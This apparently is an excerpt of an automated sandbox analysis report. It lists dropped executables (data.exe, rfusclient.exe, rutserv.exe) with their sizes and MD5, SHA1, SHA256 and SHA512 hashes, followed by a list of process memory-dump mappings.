SHA256: 6dee2aa6f4bd56f39fc6bcc46746373da93674a8cdab0525741432c7d8080203
SHA512: a678b124bb10e83b69ec07939aca9ab249f192585b36eb630f3fe2383584514949eaefc0c611196f3dcdd079c8abee3113c11328fb2a9d231eb48d1d1aa5f0c3
-
\Users\Admin\AppData\Local\Temp\data.exe
Filesize: 819KB
MD5: 71a944406c89ab321cb1e55c37916d70
SHA1: be6ee2015475bdc1a665b1e6b86e86fcc1025c91
SHA256: 4f10edbc89298118923bdb78d1f9e12406b85f34729d8a7ee4dec74f38baaa96
SHA512: 9ad4c3ad397643344ff93be905db8ae88afb61c4915873e88332b3fa00021ec5ffa858d32885dd9d374ae3d96d5913eba79f2706aef0b541121f7794d86b1cda
-
\Windows\spom\rfusclient.exe
Filesize: 1.8MB
MD5: 3afec4347159849e4ef50d179ff1fed7
SHA1: 9b3e00d0a426c622ddc34fbee96595d41bd8db72
SHA256: 7ee8203360bf7c114e892664fda4bf66d15db67f6d3192a692b6bc9bc457998f
SHA512: aa99927b06e5fefffee73124ac7ace117b74a4087090109f705c36f44f6beb5e856a55c63238c7ffc73eaba37fbd15f855ca1232cc22371039031abd8fd25bf4
-
\Windows\spom\rutserv.exe
Filesize: 6.3MB
MD5: 93a4649d70ce76d6815874fc7a72c6fb
SHA1: 1e9f663fd9cb66140001847849ddf0451365233f
SHA256: 6dee2aa6f4bd56f39fc6bcc46746373da93674a8cdab0525741432c7d8080203
SHA512: a678b124bb10e83b69ec07939aca9ab249f192585b36eb630f3fe2383584514949eaefc0c611196f3dcdd079c8abee3113c11328fb2a9d231eb48d1d1aa5f0c3
-
memory/276-57-0x0000000000000000-mapping.dmp
-
memory/464-66-0x0000000000000000-mapping.dmp
-
memory/524-68-0x0000000000000000-mapping.dmp
-
memory/696-117-0x0000000000400000-0x0000000000AE6000-memory.dmp (Filesize: 6.9MB)
-
memory/696-110-0x0000000000000000-mapping.dmp
-
memory/696-114-0x0000000000400000-0x0000000000AE6000-memory.dmp (Filesize: 6.9MB)
-
memory/744-91-0x0000000000000000-mapping.dmp
-
memory/756-87-0x0000000000000000-mapping.dmp
-
memory/1120-83-0x0000000000000000-mapping.dmp
-
memory/1136-67-0x0000000000000000-mapping.dmp
-
memory/1208-90-0x0000000000000000-mapping.dmp
-
memory/1272-103-0x0000000000000000-mapping.dmp
-
memory/1356-71-0x0000000000000000-mapping.dmp
-
memory/1360-59-0x0000000000000000-mapping.dmp
-
memory/1404-69-0x0000000000000000-mapping.dmp
-
memory/1468-55-0x0000000000400000-0x0000000000425000-memory.dmp (Filesize: 148KB)
-
memory/1468-61-0x0000000000400000-0x0000000000425000-memory.dmp (Filesize: 148KB)
-
memory/1468-54-0x0000000076BA1000-0x0000000076BA3000-memory.dmp (Filesize: 8KB)
-
memory/1552-70-0x0000000000000000-mapping.dmp
-
memory/1556-73-0x0000000000000000-mapping.dmp
-
memory/1628-101-0x0000000000000000-mapping.dmp
-
memory/1628-108-0x0000000000400000-0x0000000000AE6000-memory.dmp (Filesize: 6.9MB)
-
memory/1628-116-0x0000000004090000-0x0000000004776000-memory.dmp (Filesize: 6.9MB)
-
memory/1628-113-0x0000000004090000-0x0000000004776000-memory.dmp (Filesize: 6.9MB)
-
memory/1628-115-0x0000000000400000-0x0000000000AE6000-memory.dmp (Filesize: 6.9MB)
-
memory/1640-79-0x0000000000000000-mapping.dmp
-
memory/1672-72-0x0000000000000000-mapping.dmp
-
memory/1896-88-0x0000000000000000-mapping.dmp
-
memory/1908-86-0x0000000000000000-mapping.dmp
-
memory/1916-89-0x0000000000000000-mapping.dmp
-
memory/1936-65-0x0000000000000000-mapping.dmp
-
memory/1996-107-0x0000000002DF0000-0x00000000034D6000-memory.dmp (Filesize: 6.9MB)
-
memory/1996-106-0x0000000002DF0000-0x00000000034D6000-memory.dmp (Filesize: 6.9MB)
-
memory/2016-94-0x0000000000000000-mapping.dmp
-
memory/2044-92-0x0000000000000000-mapping.dmp